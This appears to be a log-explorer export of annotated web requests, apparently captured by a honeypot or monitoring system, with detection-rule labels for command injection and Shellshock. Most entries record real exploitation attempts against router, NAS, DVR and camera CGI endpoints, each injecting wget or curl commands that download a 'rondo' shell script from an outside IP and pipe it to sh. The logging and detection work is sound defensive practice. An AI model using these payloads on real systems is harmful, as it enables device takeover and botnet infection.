51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#32 2025-10-21 11:33:30 event 17397075 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';wget -qO- http://74.194.191.52/rondo.djc.sh|sh;' -'

More (full fields + snapshot) expand

url

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';wget -qO- http://74.194.191.52/rondo.djc.sh|sh;' -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#33 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#34 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

Suspicious command parameter combined with a recognized command token. Snippet='iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#35 2025-10-21 11:33:30 event 17397071 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

More (full fields + snapshot) expand

url

/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.eby.sh%7Csh%60

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:subshell

details

Detected subshell execution syntax (`...` or $(...)). Snippet='/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=`busybox wget -qO- http://74.194.191.52/rondo.eby.sh|sh` -'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#36 2025-10-21 11:33:29 event 17397064 GET 301 bytes 178

ann ua 14 label ua

Request CLI HTTP client user-agent: wget

referer

() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #…

Annotation facts

label

rule

ua:cli:wget

conf

80.00

details

Command-line HTTP clients are common in probing and scripted requests (also used legitimately).

More (full fields + snapshot) expand

url

referer

() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& # bang2012@atomicmail.io

summary

CLI HTTP client user-agent: wget

details

Command-line HTTP clients are common in probing and scripted requests (also used legitimately).

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#37 2025-10-21 11:33:29 event 17397068 GET 301 bytes 178

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.u'

More (full fields + snapshot) expand

url

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.u'

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#38 2025-10-21 11:33:29 event 17397068 GET 301 bytes 178

ann base label observed

Request event observed

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#39 2025-10-21 11:33:29 event 17397066 GET 301 bytes 178

ann base label observed

Request event observed

/cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#40 2025-10-21 11:33:29 event 17397065 POST 301 bytes 178

ann base label observed

Request event observed

/goform/SystemCommand

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/goform/SystemCommand

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#41 2025-10-21 11:33:29 event 17397064 GET 301 bytes 178

ann base label observed

Request event observed

referer

() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #…

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#42 2025-10-21 11:33:29 event 17397063 POST 301 bytes 178

ann base label observed

Request event observed

/dvr/cmd

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/dvr/cmd

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#43 2025-10-21 11:33:29 event 17397062 POST 301 bytes 178

ann base label observed

Request event observed

/apply.cgi

referer

http://68.183.80.204/apply.cgi

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/apply.cgi

referer

http://68.183.80.204/apply.cgi

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#44 2025-10-21 11:33:29 event 17397061 POST 301 bytes 178

ann base label observed

Request event observed

/apply.cgi

referer

http://68.183.80.204/apply.cgi

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/apply.cgi

referer

http://68.183.80.204/apply.cgi

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#45 2025-10-21 11:33:29 event 17397068 GET 301 bytes 178

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='ET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox wget -qO- http://74.194.191.52/rondo.ush.sh|sh&&curpath=/&curren'

More (full fields + snapshot) expand

url

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#46 2025-10-21 11:33:29 event 17397068 GET 301 bytes 178

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='ET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox wget -qO- http://74.194.191.52/rondo.ush.sh|sh&&curpath=/&curren'

More (full fields + snapshot) expand

url

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#47 2025-10-21 11:33:29 event 17397068 GET 301 bytes 178

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:param_plus_cmd

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

cmdi

rule

cmdi:param_plus_cmd

conf

90.00

details

Suspicious command parameter combined with a recognized command token. Snippet='ET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox wget -qO- http://74.194.191.52/rondo.ush.sh|sh&&curpath=/&curren'

More (full fields + snapshot) expand

url

/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

Command/file-injection indicator: cmdi:param_plus_cmd

details

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#48 2025-10-21 11:33:28 event 17397060 POST 301 bytes 178

ann base label observed

Request event observed

/apply.cgi

referer

http://68.183.80.204/system.html

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/apply.cgi

referer

http://68.183.80.204/system.html

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#49 2025-10-21 11:33:28 event 17397058 POST 301 bytes 178

ann base label observed

Request event observed

/GponForm/diag_Form?images/

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/GponForm/diag_Form?images/

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

#50 2025-10-21 11:33:28 event 17397057 GET 301 bytes 178

ann base label observed

Request event observed

/PictureCatch.cgi?username=GEOVISION&password=%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vgz.sh%7Csh%3B&data_type=1&attachment=1&channel=1&secret=1&key=PWNED

referer

Mozilla/5.0 (bang2012@atomicmail.io)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/PictureCatch.cgi?username=GEOVISION&password=%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vgz.sh%7Csh%3B&data_type=1&attachment=1&channel=1&secret=1&key=PWNED

referer

Mozilla/5.0 (bang2012@atomicmail.io)

summary

event observed

details

—

subnet

45.153.34.0/24

asn

51396 — Pfcloud UG

geo

The Netherlands, Limburg, Eygelshoven

org

VMHeaven.io

Log Explorer

Annotated access events

Confirm Action